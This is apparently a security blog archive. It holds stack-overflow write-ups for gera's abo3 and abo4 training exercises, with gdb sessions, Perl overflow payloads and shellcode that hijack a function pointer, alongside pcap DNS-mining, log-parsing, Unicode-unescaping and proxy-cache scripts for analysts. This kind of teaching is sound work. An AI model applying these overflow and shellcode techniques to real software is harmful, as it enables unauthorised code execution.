Keeping in mind that the variables are 268 bytes away from each other, here is a proof-of-concept detailing the control of the EIP register. What we are doing is submitting the first argument (the string copied by the first copy function) as a 272-byte string: 268 bytes of junk to get us to the overwrite of the location of pbuf, and then the address of the fn pointer. Then we’ll submit the second argument, which is what will overwrite fn, as 0x41414141 or “AAAA”. The third argument we’ll submit but leave alone as it will never get used. Upon execution, it attempts to call the value stored at fn, and segfaults. Examining EIP proves our control of execution. If you want to take this one all the way, you could follow the tried-and-true technique of storing shellcode to execute in an environment variable and determining its address with a special program, a technique I detailed in the abo1.c post I did some time ago. Happy hunting!

(gdb) run $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo4 $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $eip
0x41414141: Cannot access memory at address 0x41414141
(gdb) x
0x80496bc <fn>: 0x41414141

Passive DNS mining from PCAP with dpkt & Python

Update 04/14: A friend pointed me to dnssnarf, a project that looks like it was written at a DojoSec meeting by Christopher McBee and then updated a bit later on by Grant Stavely. It uses Scapy (which I hear is really neat if you haven’t played with it). Check Grant’s blog post about dnssnarf out.

So, here is another quickie in case anyone needs it out there in the Intertubes. Say you have a .pcap file, or many .pcap files, and you want to mine the DNS responses out of them so you can build up a passive DNS database and track malicious resolutions to build a list of ban-able IP addresses. This script aims to parse a given .pcap file (tcpdump/wireshark libpcap format) and returns the results of the query types you have interest in.

This script is built around dpkt, a tool by Dug Song, and the contents are heavily inspired by the tutorials present at Jon Oberheide’s site (also a developer of dpkt). Honestly, most of the time writing this was spent understanding how dpkt handled its internal data structures and how to get to the data. The documentation on dpkt is not the most mature, but the source is pretty readable, if you keep the references I mention in the comments at hand. Also, this script was only tested with Python 2.6 and dpkt 1.7 on Linux. It was confirmed not to work on Windows, as dpkt appears to have some serious problems with Windows at the moment.

#!/usr/bin/env python

import dpkt, socket, sys

# expect exactly one argument: the capture file to read
if len(sys.argv) != 2:
 print "Usage:\n", sys.argv[0], "filename.pcap"
 sys.exit(1)

# pcap files are binary, so open in binary mode
f = open(sys.argv[1], "rb")
pcap = dpkt.pcap.Reader(f)

for ts, buf in pcap:
 # make sure we are dealing with IP traffic
 # ref: http://www.iana.org/assignments/ethernet-numbers
 try: eth = dpkt.ethernet.Ethernet(buf)
 except: continue
 if eth.type != 2048: continue
 # make sure we are dealing with UDP
 # ref: http://www.iana.org/assignments/protocol-numbers/
 try: ip = eth.data
 except: continue
 if ip.p != 17: continue
 # filter on UDP assigned ports for DNS
 # ref: http://www.iana.org/assignments/port-numbers
 try: udp = ip.data
 except: continue
 if udp.sport != 53 and udp.dport != 53: continue
 # make the dns object out of the udp data and check for it being a RR (answer)
 # and for opcode QUERY (I know, counter-intuitive)
 try: dns = dpkt.dns.DNS(udp.data)
 except: continue
 if dns.qr != dpkt.dns.DNS_R: continue
 if dns.opcode != dpkt.dns.DNS_QUERY: continue
 if dns.rcode != dpkt.dns.DNS_RCODE_NOERR: continue
 if len(dns.an) < 1: continue
 # now we're going to process and spit out responses based on record type
 # ref: http://en.wikipedia.org/wiki/List_of_DNS_record_types
 for answer in dns.an:
   if answer.type == 5:
     print "CNAME request", answer.name, "\tresponse", answer.cname
   elif answer.type == 1:
     print "A request", answer.name, "\tresponse", socket.inet_ntoa(answer.rdata)
   elif answer.type == 12:
     print "PTR request", answer.name, "\tresponse", answer.ptrname
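
The script prints one line per answer. To get from that output to the passive DNS database mentioned at the top, something like the following could collect the lines into a lookup table. This is only a sketch in Python 3 using the standard library: the name build_pdns and the in-memory dict are my own stand-ins (not part of dpkt or the script above), and it assumes the exact line format the script prints.

```python
import re
from collections import defaultdict

# Matches lines as printed by the script above, e.g.
#   "A request www.example.com \tresponse 192.0.2.10"
LINE_RE = re.compile(r'^(CNAME|A|PTR) request (\S+)\s+response (\S+)\s*$')


def build_pdns(lines):
    """Group responses by (record type, queried name).

    Hypothetical helper: returns {(rtype, name): set of responses}.
    Lines that do not match the expected format are skipped.
    """
    table = defaultdict(set)
    for line in lines:
        match = LINE_RE.match(line)
        if match is None:
            continue
        rtype, name, response = match.groups()
        # DNS names are case-insensitive, so fold them before grouping.
        table[(rtype, name.lower())].add(response)
    return dict(table)


if __name__ == "__main__":
    sample = [
        "A request www.example.com \tresponse 192.0.2.10",
        "A request www.example.com \tresponse 192.0.2.11",
        "CNAME request mail.example.com \tresponse mx.example.net",
        "not a record line",
    ]
    for key, values in sorted(build_pdns(sample).items()):
        print(key, sorted(values))
```

A real database would also want the packet timestamp (ts in the loop above), which the script currently does not print.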

Symantec Brightmail syslog message parser

Ok, this will not be interesting to most of you folks that are subscribed (all three of you [hi Mom!]) but I’m hoping Google will get it and then if anyone needs this script, it’ll be there to help them.

This is just a simple log parser for the really, really annoying multi-line/multi-message format that Symantec Brightmail insists on using when it sends syslog information.

The key points: set your $delimiter and $nullvalue appropriately, and notice that on fields where Brightmail may log multiple messages (like the IRCPTACTION field, which basically says whether something was delivered to each individual recipient on the message) the values are joined with commas. This is ok: I verified over a large sampling that those fields never contain a comma normally, so you should be able to deal with that just fine if you want to script against the results.

Questions? Comment away. I check ’em.

use strict;
use Carp;

my ($in, $out) = @ARGV;
my $DEBUG=0;
my $line;

croak "\nPlease specify input & output files.  Usage\n\n\t$0 infile outfile\n\n" if (!$in or !$out);
croak "\nABORTED: Input and output files are the same: $in\n\n" if ($in eq $out);

# parenthesize so that "or die" applies to open() and not to the filename
open(INFILE, '<', $in) or die $!;
open(OUTFILE, '>', $out) or die $!;

my %result_hash = ();
my $delimiter = "~!^!~"; # I use something weird because the subject line could have anything
my $nullvalue = "NULL";

foreach $line (<INFILE>) {
  chomp($line);
  chomp($line);
  # print "\$line = $line\n";

  # Discard lines that are not from bmserver or ecelerity (the two Brightmail components)
  unless ($line =~ /bmserver:/ || $line =~ /ecelerity:/) { next; }

  # split on pipes "|" to process further
  my ($timestuff, $UID, $msgtype, $therest) = split(/\|/, $line, 4);

  # do some basic validation of UID and msgtype fields, throwaway outliers
  if ($UID =~ /\Q[^0-9a-z\-]\E/ || $msgtype =~ /\Q[^A-Z]\E/) { next; }

  # now we parse all of this crap into a big hash
  if (exists($result_hash{$UID})) {
     if (exists($result_hash{$UID}{$msgtype})) {
        $result_hash{$UID}{$msgtype} = $result_hash{$UID}{$msgtype}.",".$therest;
     } else {
        $result_hash{$UID}{$msgtype} = $therest;
     }
  } else {
     my @timefields = split(/ +/, $timestuff);
	 $result_hash{$UID}{"TIMESTAMPINT"} = $timefields[-1];
     $result_hash{$UID}{$msgtype} = $therest;
  }
}

my @recs_to_sort = ();
my @hash_elements = qw(ACCEPT ATTACH ATTACHFILTER DELIVER DELIVERY_FAILURE IRCPTACTION MSGID ORCPTS SENDER SOURCE SUBJECT TRACKERID UNSCANNABLE UNTESTED VERDICT VIRUS);
for my $key (keys %result_hash) {
  my @tmp_line = ();
  push(@tmp_line, $result_hash{$key}{"TIMESTAMPINT"});
  push(@tmp_line, $key);
  foreach my $element (@hash_elements) {
     if (exists($result_hash{$key}{$element})) {
        push(@tmp_line, $result_hash{$key}{$element});
     } else {
        push(@tmp_line, $nullvalue);
     }
  }
  push(@recs_to_sort, join($delimiter,@tmp_line));
}

# sort by time for our database inserts
my @sorted_recs = sort @recs_to_sort;

foreach (@sorted_recs) {
  print OUTFILE "$_\n";
}
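
If you want to script against the results, reading the output file back could look roughly like this. It is a sketch in Python 3 under a few assumptions: the delimiter and null value are the ones set in the Perl script above, the column order is timestamp, UID, then @hash_elements, and only IRCPTACTION is treated as a comma-separated multi-value field because that is the one I named above. The name parse_record is made up for the example.

```python
DELIMITER = "~!^!~"   # must match $delimiter in the Perl script
NULLVALUE = "NULL"    # must match $nullvalue in the Perl script

# Column order written by the Perl script: timestamp, UID, then @hash_elements.
FIELDS = ["TIMESTAMPINT", "UID"] + """ACCEPT ATTACH ATTACHFILTER DELIVER
DELIVERY_FAILURE IRCPTACTION MSGID ORCPTS SENDER SOURCE SUBJECT TRACKERID
UNSCANNABLE UNTESTED VERDICT VIRUS""".split()

# Assumption: fields to split on commas. Add others here if your logs need it.
MULTI_VALUE = {"IRCPTACTION"}


def parse_record(line):
    """Turn one output line into a dict keyed by field name."""
    values = line.rstrip("\n").split(DELIMITER)
    if len(values) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(values)))
    record = {}
    for name, value in zip(FIELDS, values):
        if value == NULLVALUE:
            record[name] = None            # field never appeared for this UID
        elif name in MULTI_VALUE:
            record[name] = value.split(",")
        else:
            record[name] = value           # e.g. SUBJECT may contain commas
    return record
```

Feeding it each line of the output file gives one dict per message UID, already in timestamp order.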

Python Unescape 16-bit Unicode String to File

Archived here for me, maybe someone else will need it. Frequently when our analysts are doing malcode analysis, particularly on malicious PDF documents, they see shellcode in the form of 16-bit Unicode values that are then unescaped into the heap by calling the JavaScript unescape() function. Problem is, we do most of our malicious JavaScript analysis from the command line with Spidermonkey, and it has some truncation issues with unescaping 16-bit Unicode correctly (it handles ASCII just fine). The devs are well aware of the issue, btw, so don’t bother them ;-).

So I wrote a quickie to take a string, massage it to the right byte order, and slap it to STDOUT, which the analyst can then redirect to a file or whatever. If there is a much easier way to do this, I’m all ears.

#!/usr/bin/python

import binascii
import sys
import re

# print usage if args wrong
if len(sys.argv) != 2:
  print "Usage: " + sys.argv[0] + " <string to decode>"
  print "where string is something like '%u30CC%u4560'"
  print "Keep in mind this only works for unicode 16-bit"
  print "which means 2 bytes (four hexadecimal chars with %u"
  print "in front of them)."
  sys.exit()

# convert string to upper since we don't care
string = sys.argv[1].upper()

# strip surrounding quotes first so they don't trip the validation below
string = string.strip('"').strip("'")

# clean up the string for processing, do some rudimentary input validation
if re.findall(r'[^UA-F0-9\\%]', string):
  print "invalid string submitted\nonly the following chars are allowed:"
  print ''' % \ u U A-F a-f 0-9 ' " '''
  sys.exit()
string = re.sub(r'(%|\\)[U]', '', string)

# check one last time that we have only hex
if re.findall(r'[^A-F0-9]', string):
  print "invalid string submitted\nonly the following chars are allowed:"
  print ''' % \ u U A-F a-f 0-9 ' " '''
  sys.exit()

# split up the string, do our stuff with hex
a = []
for i in string: a.append(i)
if len(a) % 4 != 0:
  print "you are missing some characters, must be in groups of 4"
  print "did your copy mess up?"
  sys.exit()
b = ""
while len(a) > 0:
  b1 = a.pop(0) + a.pop(0)
  b2 = a.pop(0) + a.pop(0)
  b = b + b2 + b1

result = binascii.a2b_hex(b)
sys.stdout.write(result)
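
For what it’s worth, here is a shorter take on the same idea, as a sketch in Python 3 rather than the Python 2 above. The function name unescape_u16 is mine, and this version is a bit stricter than the original: it assumes every 16-bit unit is written as %uXXXX or \uXXXX and rejects anything else, where the script above also accepts bare hex.

```python
import re
import sys

# One 16-bit unit: %uXXXX or \uXXXX, upper or lower case.
UNIT_RE = re.compile(r'(?:%|\\)[uU]([0-9a-fA-F]{4})')


def unescape_u16(text):
    """Turn '%u30CC%u4560' into the bytes CC 30 60 45.

    Each unit is written out little-endian, which is the same byte swap
    the original script does by hand with b2 + b1.
    """
    text = text.strip().strip('"').strip("'")
    # Reject input with anything left over once the units are removed.
    if UNIT_RE.sub('', text) != '':
        raise ValueError("input must consist only of %uXXXX or \\uXXXX groups")
    units = UNIT_RE.findall(text)
    return b''.join(int(unit, 16).to_bytes(2, 'little') for unit in units)


if __name__ == "__main__" and len(sys.argv) == 2:
    # Write raw bytes, not text, so the result can be redirected to a file.
    sys.stdout.buffer.write(unescape_u16(sys.argv[1]))
```

Usage is the same as before: pass the string as the only argument and redirect STDOUT to a file.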

Bluecoat ProxySG Cache Retrieval Script in Python

So, I was actually looking at this script today and thought folks who use Bluecoat as proxies at their jobs (I get the impression that they are pretty popular) might be interested in checking it out. It’s kind of like a poor-man’s pcap solution for sites that use a robust Bluecoat proxy but don’t have pcap instrumentation everywhere.

If you give this script a URI, and a list of Bluecoat proxies, and some credentials to those proxies, it essentially goes and grabs the URI, writes it to disk and includes some information on the last time it was modified on disk, etc. Sometimes, you can use this to retrieve malicious payload that is otherwise unavailable to you due to take-down by LE or replay-filtering by the adversary.

Print usage with --help, make sure you define your setup variables appropriately before you run it, and I hope you find it useful.

#!/usr/bin/env python
# creds: I wrote most of this, only thing I used for inspiration was this HTML table parser article: http://simbot.wordpress.com/2006/05/17/html-table-parser-using-python/
# though honestly, his parser is much more feature-rich, his code taught me how the HTMLParser class works
# email me at mishley at-sign gmail dot com for cake and/or questions

import sys
import os
import urllib
from HTMLParser import HTMLParser
import optparse
import re
import time

# setup variables
default_proxies = [ "192.168.1.2", "192.168.1.3" ] # default list of proxies to use if -p is not provided
bluecoat_web_port = "3443" # web port to access bluecoat proxy web admin interface
bluecoat_web_user = "username" # username for above interface
bluecoat_web_pass = "password" # password for above interface
bluecoat_proxy_port = "3128" # proxy port to request that a proxy directly proxy a request, may also probably use 80

# parse command line args
parser = optparse.OptionParser()
parser.add_option("-u", "--uri", type="string", action="store", dest="uri", help="URI to retrieve. Must be a file object, not a directory.")
parser.add_option("-p", "--proxyip", type="string", action="append", dest="proxyip", help="Proxy IP addresses to search (defaults to all Bluecoats), can be used multiple times for multiple IP addresses. (if used more than once, --all is assumed)")
parser.add_option("-l", "--log", dest="log", action="store_true", default=False, help="Write file object metadata to log file, <filename>.log.")
parser.add_option("-a", "--all", dest="all", action="store_true", default=False, help="Grab a copy of the file from every proxy on which it is found, not just the first in the list. These files may be identical, use md5sum to check.")
options, args = parser.parse_args()

# input validation
if len(sys.argv) == 1:
        parser.print_help()
        sys.exit()
if options.proxyip and len(options.proxyip) > 1:
	options.all = True
if not options.proxyip:
	options.proxyip = default_proxies
else:
	for i in options.proxyip:
		if re.search('[^0-9\.]', i):
			parser.error("Option --proxyip must use a valid IP address, exiting.")
if not options.uri:
	parser.error("Option --uri is required for use, exiting.")

class proxyopen(urllib.FancyURLopener):
	def prompt_user_passwd(self, host, realm):
		return bluecoat_web_user, bluecoat_web_pass
	def http_error_401(self, url, fp, errcode, errmsg, headers, data=None):
		"""Error 401 -- authentication required. This function supports Basic authentication only."""
		self.tries += 1
		if self.maxtries and self.tries >= self.maxtries:
			self.tries = 0
			return self.http_error_default(url, fp, 500, "HTTPS Basic Auth timed out after "+str(self.maxtries)+" attempts.", headers)
		# URLopener lives in the urllib module, so it has to be referenced through it here
		if not 'www-authenticate' in headers:
			urllib.URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		stuff = headers['www-authenticate']
		import re
		match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', stuff)
		if not match:
			urllib.URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		scheme, realm = match.groups()
		if scheme.lower() != 'basic':
			urllib.URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		name = 'retry_' + self.type + '_basic_auth'
		if data is None:
			return getattr(self,name)(url, realm)
		else:
			self.tries = 0
			return getattr(self,name)(url, realm, data)

def checkURI(uri="http://www.google.com/favicon.ico", proxyip="192.168.1.2"):
	opener = proxyopen()
	protocol, domainandpath = uri.split('//')
	protocol = protocol.rstrip(':')
	if protocol != 'http':
		sys.exit("Cannot process non-http requests, exiting.")
	try: page = opener.open("https://" + proxyip + ":" + bluecoat_web_port + "/CE/Info/" + protocol + "/" + domainandpath).read()
	except: return "NOCONN_0xDEADBEEF"
	if page.find('Authentication required') > -1: return "NOAUTH_0xDEADBEEF"
	if page.find('0x00000007') == -1 and page.find('CE URL Information') > -1: return page
	else: return "NOTFOUND_0xDEADBEEF"

def fdURI(uri="http://www.google.com/favicon.ico", proxyip="192.168.1.2"):
	proxy = { 'http': 'http://'+proxyip+':'+bluecoat_proxy_port }
	fd = urllib.urlopen(uri, proxies=proxy)
	return fd

class parseTable(HTMLParser):
	def __init__(self):
		HTMLParser.__init__(self)
		self.in_table = 0
		self.in_tr = 0
		self.in_td = 0
		self.tabledata = []
	def handle_starttag(self, tag, attrs):
		if tag == 'table': self.in_table = 1
		if tag == 'tr': self.in_tr = 1
		if tag == 'td': self.in_td = 1
	def handle_data(self, data):
		if self.in_td and self.in_tr and self.in_table:
			self.tabledata.append(data)
	def handle_endtag(self, tag):
		if tag == 'table': self.in_table = 0
		if tag == 'tr': self.in_tr = 0
		if tag == 'td': self.in_td = 0

if __name__ == "__main__":
	filename = options.uri.split('/')[-1]
	for proxy in options.proxyip:
		meta = checkURI(options.uri, proxy)
		if meta == "NOCONN_0xDEADBEEF":
			print "Unable to connect to proxy "+proxy+" via urllib to find URL '"+options.uri+"'."
			continue
		elif meta == "NOTFOUND_0xDEADBEEF":
			print "Unable to locate URL '"+options.uri+"' in proxy "+proxy+"."
			continue
		elif meta == "NOAUTH_0xDEADBEEF":
			print "Unable to authenticate to proxy "+proxy+"."
			continue
		else:
			fd = fdURI(options.uri, proxy)
			outstring = fd.read()
			# we are going to re-grab meta data now that we've potentially
			# modified the last-cached timestamp
			meta = checkURI(options.uri, proxy)
			tableparser = parseTable()
			tableparser.feed(meta)
			tableparser.close()
			parsed = tableparser.tabledata
			tableparser = None
			lastretrieved = time.strftime("%Y%m%d_%H:%M:%S_UTC", time.strptime(' '.join(parsed[9].split()[2:4]), "%m/%d/%Y %H:%M:%S"))
			fullname = filename+"_"+proxy+"_"+lastretrieved
			outfile = open(fullname, 'wb')
			outfile.write(outstring)
			outfile.close()
			fd.close()
			print "Downloaded file '"+fullname+"' successfully."
			if options.log:
				logfile = open(fullname+".log", 'wb')
				j = 0
				for i in parsed:
					j = j + 1
					if j % 2 == 0: logfile.write(i+"\n")
					else: logfile.write(i+" :: ")
				logfile.close()
				print "Successfully wrote metadata to file '"+fullname+".log'."
			if options.all: continue
			else: break
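
The table parsing is the only part of the script that is not plain plumbing, so here is that piece on its own as a sketch in Python 3 (where the module is html.parser). The class and function names are mine, and the sample HTML in the usage note is invented; I am not reproducing the real Bluecoat info page here. Unlike the script above, this version also drops whitespace-only cells.

```python
from html.parser import HTMLParser


class CellCollector(HTMLParser):
    """Collect the text of every <td> cell that sits inside a <table>/<tr>."""

    def __init__(self):
        super().__init__()
        self.open_tags = {"table": False, "tr": False, "td": False}
        self.cells = []

    def handle_starttag(self, tag, attrs):
        if tag in self.open_tags:
            self.open_tags[tag] = True

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            self.open_tags[tag] = False

    def handle_data(self, data):
        # Only keep text seen while table, tr and td are all open.
        if all(self.open_tags.values()) and data.strip():
            self.cells.append(data.strip())


def table_pairs(html):
    """Pair up cells as (label, value), the way the log writer above does."""
    parser = CellCollector()
    parser.feed(html)
    parser.close()
    cells = parser.cells
    return list(zip(cells[0::2], cells[1::2]))
```

Calling table_pairs("<table><tr><td>Size</td><td>1234</td></tr></table>") gives a single ("Size", "1234") pair, which corresponds to the "label :: value" lines the script writes to the .log file.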

Insecure Programming by Example: abo3.c

Updated 03/20/2010 to add an excellent introduction to pointers in C and C++.

The theme for this exercise was provided by one of the folks I follow on Twitter.

@kpyke: And so sayeth the @pusscat: “If you gave me the source code, I’d just compile it and look at it in a debugger anyways…”

This got me thinking, especially in the context of this challenge, that the source code sometimes isn’t all that useful. This is true in this case with this exercise. And maybe this is a milestone in my understanding of “how shit works”, but I have a feeling I’ll be spending a lot more time with the built-in disassemblers in gdb/Ollydbg/Windbg than with a list of the source.  This time, we’ll be working on abo3.c, the next in gera’s series on Insecure Programming. I’m aiming for brevity from now on in these posts so they are not so much work (I’m lazy), so let’s get straight to the code.

gera says:

microprocessor ownership

How to make the microprocessor make what you want? Who owns the Instruction Pointer, owns the execution flow, and that’s what we need. All bytes are composed of bits, but some of them are just numbers, and some of them are addresses to code. Jump! Geronimoooooooooo…

/* abo3.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step                     */

int main(int argv,char **argc) {
   extern system,puts;
   void (*fn)(char*)=(void(*)(char*))&system;
   char buf[256];

   fn=(void(*)(char*))&puts;
   strcpy(buf,argc[1]);
   fn(argc[2]);
   exit(1);
}

gera continues:

buf is in the stack, and after it are some bits you can change, that you’ve learnt in abo1.

In case you wonder why we put that there, is so the linker doesn’t remove it.

This exercise makes use of a couple of things we haven’t covered in previous posts. One, this code uses the extern keyword in the C language to make the system and puts functions available. What this does (I think) is declare that the two symbols are defined somewhere else and leave it to the linker to resolve them against libc; no header files are involved, which is why taking &system and &puts works without including stdlib.h or stdio.h. One thing that is not immediately clear is that the system and puts addresses are both written to the same location (fn), so the first assignment is never used. I think that is what gera is talking about with “so the linker doesn’t remove it”: the otherwise pointless reference to system keeps it linked into the binary. Secondly, this code makes extensive use of pointers in C, which is a subject I probably need to learn a lot more about.  As a quick summary, pointers contain a memory address, and have various unary operators that apply to them.  For a pointer named (creatively) POINTER, you could use the & or address-of operator to get the address of the pointer variable itself (&POINTER), use POINTER without any operators to get the memory address that POINTER contains, or dereference it with the * operator (*POINTER) to get the data stored at the address the pointer references.  Pointers can get nested, and be generally confusing.  You should read up on this, as it’s an important subject, and I’m not speaking from a great deal of experience.
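
If you want to poke at those three views of a pointer without a C compiler handy, Python’s ctypes module gets reasonably close. Treat this as a rough analogy only: ctypes objects are not C variables, and the variable names are just for the example.

```python
import ctypes

value = ctypes.c_int(42)          # an ordinary variable
pointer = ctypes.pointer(value)   # roughly: int *pointer = &value;

# POINTER with no operator: the address the pointer holds.
held_address = ctypes.cast(pointer, ctypes.c_void_p).value
# &POINTER: where the pointer variable itself lives.
own_address = ctypes.addressof(pointer)
# *POINTER: the data stored at the address the pointer holds.
pointed_value = pointer.contents.value

print(hex(held_address), hex(own_address), pointed_value)

# Writing through the pointer changes the original variable,
# which is the whole point of the exploit in this post.
pointer.contents.value = 7
print(value.value)
```

The addresses will differ on every run, but the held address always equals the address of value, and the pointer’s own address is somewhere else.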

As is always the case, we’ll not focus too much on the high-level representation of this code, rather, we’ll disassemble it in GDB. Here is a deadlist of the compiled executable.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    DWORD PTR [ebp-12],0x80482fc
0x0804842e <main+26>:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048438 <main+36>:   add    eax,0x4
0x0804843b <main+39>:   mov    eax,DWORD PTR [eax]
0x0804843d <main+41>:   mov    DWORD PTR [esp+4],eax
0x08048441 <main+45>:   lea    eax,[ebp-0x118]
0x08048447 <main+51>:   mov    DWORD PTR [esp],eax
0x0804844a <main+54>:   call   0x804831c <strcpy@plt>
0x0804844f <main+59>:   mov    eax,DWORD PTR [ebp+12]
0x08048452 <main+62>:   add    eax,0x8
0x08048455 <main+65>:   mov    eax,DWORD PTR [eax]
0x08048457 <main+67>:   mov    DWORD PTR [esp],eax
0x0804845a <main+70>:   mov    eax,DWORD PTR [ebp-12]
0x0804845d <main+73>:   call   eax
0x0804845f <main+75>:   mov    DWORD PTR [esp],0x1
0x08048466 <main+82>:   call   0x804833c <exit@plt>
End of assembler dump.

As always seems to be the case with these exploits, we have to ask ourselves what within the program’s execution we control. Where does the program accept input from the user, and what does that mean to us? In this case, the program is using the ever-awesome strcpy function, which of course does not do a bounds check, and is copying a bunch of our data to the stack (as much as we want). We would typically move forward with overwriting the main stack frame’s return address, and controlling execution that way. Unfortunately, there is a pesky call to exit, which we first encountered in the last example, that will prevent us from doing that.

So we’ll have to go some other route. The obvious candidate to me is the call eax instruction. If we can somehow control the contents of the eax register at that point, we can take control of execution, and run arbitrary code. I think this particular exercise contains an important lesson; sometimes the actual high level code can be harder to understand than the disassembled code. I personally feel that this is the case here. If we only pay attention to what’s in the debugger, this is actually not such a tricky exercise.

We know fn is a function pointer that is called. In the deadlisting, it resides at ebp-12. Basically, if we can control the contents of ebp-12 we can control execution. This actually turns out to be really easy: since fn is a local variable in main, the compiler places it on the stack above buf, so it is trivial to overwrite with the unbounded strcpy() call. Here is a record of the exploit.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q abo3
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    DWORD PTR [ebp-12],0x80482fc
0x0804842e <main+26>:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048438 <main+36>:   add    eax,0x4
0x0804843b <main+39>:   mov    eax,DWORD PTR [eax]
0x0804843d <main+41>:   mov    DWORD PTR [esp+4],eax
0x08048441 <main+45>:   lea    eax,[ebp-0x118]
0x08048447 <main+51>:   mov    DWORD PTR [esp],eax
0x0804844a <main+54>:   call   0x804831c <strcpy@plt>
0x0804844f <main+59>:   mov    eax,DWORD PTR [ebp+12]
0x08048452 <main+62>:   add    eax,0x8
0x08048455 <main+65>:   mov    eax,DWORD PTR [eax]
0x08048457 <main+67>:   mov    DWORD PTR [esp],eax
0x0804845a <main+70>:   mov    eax,DWORD PTR [ebp-12]
0x0804845d <main+73>:   call   eax
0x0804845f <main+75>:   mov    DWORD PTR [esp],0x1
0x08048466 <main+82>:   call   0x804833c <exit@plt>
End of assembler dump.
(gdb) break 1
Breakpoint 1 at 0x8048414: file abo3.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo3 one two

Breakpoint 1, main (argv=134513684, argc=0x3) at abo3.c:6
6       int main(int argv,char **argc) {
(gdb) x $ebp-12
0xbffff82c:     0xb8000ff4
(gdb) x buf
0xbffff720:     0x080481ac
(gdb) print 0xbffff82c-0xbffff720
$1 = 268
(gdb) delete breakpoints
Delete all breakpoints? (y or n) y
(gdb) break *0x0804845d
Breakpoint 2 at 0x804845d: file abo3.c, line 13.
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') argtwo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo3 $(perl -e 'print "A" x 268 . "BBBB";') argtwo

Breakpoint 2, 0x0804845d in main (argv=3, argc=0xbffff754) at abo3.c:13
13              fn(argc[2]);
(gdb) x $eax
0x42424242:     Cannot access memory at address 0x42424242

Since the program in question isn’t pushing and popping at all, and doesn’t appear to be modifying esp or ebp that much, we can just run the program once real quick from the beginning to populate the registers and determine the offset between our unbounded strcpy destination buf and ebp-12. Once we have the offset, we’ll re-run the program with a quick inline Perl script to print the offset-worth of junk bytes and the string “BBBB” to overwrite ebp-12. I’ve placed a breakpoint directly before the call eax instruction, and at that point we examine eax to confirm that we control execution. Now here is a quickie with shellcode that we’ll reuse from abo1.c.

hacking@hacking-theart:~/InsecureProgramming $ cat abo3shellc.txt
BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; The 8-byte string to print, no trailing newline.
hacking@hacking-theart:~/InsecureProgramming $ nasm -o abo3shellc.bin abo3shellc.txt
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C abo3shellc.bin
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat abo3shellc.bin)
hacking@hacking-theart:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=�Y1��1�C1̀�K̀�����you win!
hacking@hacking-theart:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo3
SHELLCODE will be at 0xbffff9d2
hacking@hacking-theart:~/InsecureProgramming $ ./abo3 $(perl -e 'print "A" x 268 . "\xd2\xf9\xff\xbf";') two
you win!hacking@hacking-theart:~/InsecureProgramming $
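
For the record, the numbers in that last command line fall straight out of the disassembly. Here is the same arithmetic as a small Python 3 sketch; the constant and function names are mine, the offsets come from the deadlisting, and the address is the one getenvaddr reported on my box (it will differ on yours).

```python
import struct

BUF_OFFSET = 0x118            # buf starts at ebp-0x118 (lea eax,[ebp-0x118])
FN_OFFSET = 12                # fn lives at ebp-12 (mov eax,DWORD PTR [ebp-12])
SHELLCODE_ADDR = 0xbffff9d2   # value getenvaddr printed in the session above

# Bytes copied from the hexdump of abo3shellc.bin above.
SHELLCODE = bytes.fromhex(
    "eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 08 cd 80 "
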